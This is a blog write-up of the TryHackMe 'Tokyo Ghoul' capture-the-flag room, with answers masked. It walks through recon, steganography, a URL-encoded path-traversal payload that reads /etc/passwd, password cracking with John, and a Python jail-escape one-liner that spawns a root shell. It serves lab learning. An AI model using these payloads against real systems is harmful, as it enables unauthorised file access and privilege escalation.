TryHackMe: Tokyo Ghoul

Today we will take a look at TryHackMe: Tokyo Ghoul My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes. Then you can start watching the anime. ;)

Recon

Task 1: About the room

# Read the above

> No answer needed

# Deploy the machine

> No answer needed

Task 2: Where am i ?

#Use nmap to scan all ports

Command: sudo nmap -sS -sC -sV -oN nmap/initial $IP

# How many ports are open ?

Answer: *

# What is the OS used ?

> U*****

Task 3: Planning to escape

#Did you find the note that the others ghouls gave you? where did you find it ?

> j********.****

# What is the key for Rize executable?

##Let’s check the ftp port and get the files we need from inside

Command: ftp IP

##Let’s look at the files.

## Here we see the ELF (Extensible Linking Format) File

## Let’s give the authority to work

Command: sudo chmod +x need_to_talk

Command: ./need_to_talk

## Return the characters to the letters using the Strings command

Command: strings need_to_talk

> k********

# Use a tool to get the other note from Rize .

## Let’s restart the file because we found the password.

## Now let’s get the note from the picture with the given paraphrase

Command: steghide extract -sf rize_and_kaneki.jpg

Task 4 What Rize is trying to say?

# What the message mean did you understand it ? what it says?

## When we open the text, we are greeted by the Morse code.

## Let’s try to read

## We are confronted with mixed codes. We do not know what it is, so we turn to CyberChef

> d***************

# Can you see the weakness in the dark ? no ? just search

## Let’s check the site directory

> gobuster dir -u http://10.10.255.75/d******/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

## The new page gives us a choice, I checked both and they come to the same place.

# What did you find something ? crack it

## I wanted to look for LFI, but he answered me like this

## So you need to bypass the back filter. Let’s do some research.

https://raw.githubusercontent.com/emadshanab/LFI-Payload-List/master/LFI%20payloads.txt

## /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

## I’m not silly dude ;)

# What is rize username ?

> k********

# What is rize password ?

## Let’s use John and the rockyou list.

Command: sudo john hash — wordlist=/usr/share/wordlists/rockyou.txt

> p**********

Task 5: Fight Jason

# User.txt

## Let’s connect with ssh.

Command: ssh username@IP

# root.txt

## Check list the allowed commands

Command: sudo -l

## We see jail python here. After some research, I found a bypass

Command: __builtins__.__dict__[‘__IMPORT__’.lower()](‘PTY’.lower()).__dict__[‘SPAWN’.lower()](‘/bin/bash’)

## And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”

--

--

--

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Day 13 — Maximum Product of Three Numbers

Sustainability Measures with the Archives Unleashed Team

How To Find Element By Text In Selenium WebDriver

From zero to become a web developer in 6 months from a non-tech background

Java List Benchmarks

Campaign App as Platform as Service using AWS

Clear understand stuff should care.

Fix Kubernetes / k3s DNS on Oracle Cloud

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Al1z4deh:~# echo "Welcome"

Al1z4deh:~# echo "Welcome"

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

More from Medium

Linux Administration ( part 2 ): creating/managing groups in Linux

hackpeas, Viraj Vaishnav, veer1024, Viraj1024

onewrite CTF Writeup

Command and Control Linux Machines: navi push